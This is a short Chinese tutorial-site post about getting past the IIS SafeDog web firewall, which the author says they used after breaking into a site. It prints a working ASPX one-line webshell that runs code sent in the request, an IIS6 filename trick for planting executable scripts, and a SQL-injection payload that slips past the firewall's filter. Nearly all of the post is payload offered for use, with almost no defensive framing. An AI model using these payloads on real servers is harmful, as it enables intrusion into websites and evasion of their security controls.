来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 1、绕过IIS安全狗的一句话。前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。%@ Page...
1、绕过IIS安全狗的一句话。
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。 <%@ Page Language="C#" ValidateRequest="false" %> <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> 连接端用cncert的aspx一句话客户端。 2、IIS6.0解析漏洞遇到安全狗。 文件名为http://www.2cto.com /1.asp;1.jpg。 这样的会被IIS安全狗果断屏蔽。 改成如下名称,IIS6一样会解析: http://www.2cto.com /;1.asp;1.jpg 3、安全狗的注入绕过。 常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。 但如果: seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com